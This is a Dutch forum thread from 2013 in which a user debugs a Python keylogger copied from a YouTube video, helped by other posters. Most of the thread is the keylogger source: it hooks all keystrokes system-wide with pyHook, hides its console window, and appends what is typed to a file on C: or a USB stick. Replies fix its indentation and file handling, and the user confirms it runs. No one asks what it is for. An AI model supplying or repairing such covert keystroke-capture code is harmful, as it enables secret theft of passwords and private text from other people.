Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Python Keylogger

Pagina: 1
Acties:

• OneTimer
  • Registratie: September 2012
  • Laatst online: 22:31
Hallo,
ik was een video aan het kijken op Youtube over hoe je een eigen Keylogger kunt maken met Python. YouTube: How To Make A Keylogger
Ik heb Python 2.6 en alle andere paketten gedownload zoals in het filmpje werd gezegd, en de code erin geplakt. Als ik het Python project opsla en daarna uitvoer komt er een kort CMD scherm en dan begin ik iets te typen in Firefox/Kladblok.
Het probleem is alleen dat er niks wordt gelogd. Als ik de keylogger wil stoppen moet ik op CTRL E drukken en dan zou er een output.txt op de C schijf verschijnen waar de getypte dingen staan. Ik heb ook al geprobeerd output.txt handmatig te maken en het dan te proberen, maar dat werkt ook niet.
Ik heb al op forums gezocht maar niks gevonden over het mogelijke probleem. Ook heb ik inplaats van de C schijf een USB stick gebruikt als pad en in de code aangepast naar F:\output.txt.. Ook dit werkte niet.
Dit is de code, kan iemand me misschien helpen.
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
if event.Ascii==5:

_exit(1)
if event.Ascii != 0 or 8:
f=open("F:\output.txt",'r')

buffer=f.read()
f.close()

f=open("F:\output.txt",'w')
keylogs=chr(event.Ascii)

if event.Ascii==13:
keylogs='/n'
buffer += 
keylogs
f.write(buffer)
f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

Quatt | Tado X | Vloerverwarming | 9x 435 Wp Enphase IQ8+ | Marstek Venus E 5,12 kWh v151 | HW P1

• ValHallASW
  • Registratie: Februari 2003
  • Niet online
code:
1
2
3
4
5
C:\Users\ikke>keylogger.py
  File "C:\Users\ikke\keylogger.py", line 11
    if event.Ascii==5:
     ^
IndentationError: expected an indented block

Je python-venster sluit meteen omdat er een fout optreedt. Als je éérst cmd start en dáárin je script start dan zie je de output, en op basis daarvan kan je verder met debuggen.

Verder: let op je inspringen, het is '\n' en niet '/n'. En appenden aan een bestand kan je beter doen door de file in mode 'a' te openen dan door het bestand eerst in te lezen en dan met nieuwe data weg te schrijven.

Overigens werkt het ook mét correcte inspringing e.d. nog niet - sterker nog: dan verdwijnt het console-scherm ook spontaan, maar dat zal je dan zelf moeten debuggen.

• OneTimer
ValHallASW schreef op zaterdag 22 juni 2013 @ 22:36:
code:
1
2
3
4
5
6
7
C:\>logger.py
  File "C:\logger.py", line 11
    if event.Ascii==5:
     ^

C:\>

Je python-venster sluit meteen omdat er een fout optreedt. Als je éérst cmd start en dáárin je script start dan zie je de output, en op basis daarvan kan je verder met debuggen.

Verder: let op je inspringen, het is '\n' en niet '/n'. En appenden aan een bestand kan je beter doen door de file in mode 'a' te openen dan door het bestand eerst in te lezen en dan met nieuwe data weg te schrijven.

Overigens werkt het ook mét correcte inspringing e.d. nog niet - sterker nog: dan verdwijnt het console-scherm ook spontaan, maar dat zal je dan zelf moeten debuggen.
Thx voor het reageren.
Als ik het in CMD start krijg ik hetzelfde
code:
1
2
3
if event.Ascii==5:
     ^

Ik heb '/n' naar '\n' veranderd, levert geen ander resultaat op. Ik zou geen idee hebben waar het aan kan liggen. De "if" staat normaal in het script, niet toevallig zonder spatie of een extra spatie, dus daar kan het niet aan liggen.

Quatt | Tado X | Vloerverwarming | 9x 435 Wp Enphase IQ8+ | Marstek Venus E 5,12 kWh v151 | HW P1

• Daos
  • Registratie: Oktober 2004
  • Niet online
Bij def, if etc. moet je wat erna komt inspringen. Lees eens een python-tutorial.

Of bekijk de video beter. Daar doen ze het wel goed:
Python:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
    if event.Ascii==5:
        _exit(1)

if event.Ascii != 0 or 8:
        f=open("F:\output.txt",'r')
        buffer=f.read()
        f.close()
        f=open("F:\output.txt",'w')
        keylogs=chr(event.Ascii)
        if event.Ascii==13:
            keylogs='\n'
        buffer += keylogs
        f.write(buffer)
        f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

• OneTimer
Daos schreef op zaterdag 22 juni 2013 @ 23:17:
Bij def, if etc. moet je wat erna komt inspringen. Lees eens een python-tutorial.

Of bekijk de video beter. Daar doen ze het wel goed:
Yes het werkt nu, de inspringingen waren het probleem ;).
Ik krijg nu wel alles wat ik typ 3x in de log te zien.
Ik typ: "Hallo"
En ik krijg "HHHaaalllooo" te zien.
Maar ik zal hier zelf naar kijken en proberen te verhelpen. Als ik er niet uit kom zal ik wel om hulp vragen ;)
Bedankt.

• Z-Dragon
  • Registratie: December 2002
  • Laatst online: 22-11 23:52
Dat zal er wel mee te maken hebben dat het indrukken van een toets onder Windows resulteert in drie events: KeyDown, KeyUp en KeyPress.

[ Voor 5% gewijzigd door Z-Dragon op 22-06-2013 23:42 ]

^ Wat hij zegt.

• OneTimer
Z-Dragon schreef op zaterdag 22 juni 2013 @ 23:42:
Dat zal er wel mee te maken hebben dat het indrukken van een toets onder Windows resulteert in drie events: KeyDown, KeyUp en KeyPress.
Ik zal me er morgen meer in gaan verdiepen. Heb niet echt heel veel ervaring ;)

• Puch-Maxi
  • Registratie: December 2003
  • Laatst online: 17:15
Oh, dit is leuk. Doe momenteel voor mijn studie redelijk veel met Python 3. Ik zal hier ook eens ff naar kijken :).

My favorite programming language is solder.

• Daos
  • Registratie: Oktober 2004
  • Niet online
PM_Petrol schreef op zaterdag 22 juni 2013 @ 23:37:
Ik krijg nu wel alles wat ik typ 3x in de log te zien.
Heb je de keylogger niet gewoon 3x draaien?

• Saven
  • Registratie: December 2006
  • Laatst online: 20:24

Saven

Administrator

denk eerder dat het ook ligt dat windows meerdere keypress states heeft zoals z-dragon zegt
Pagina: 1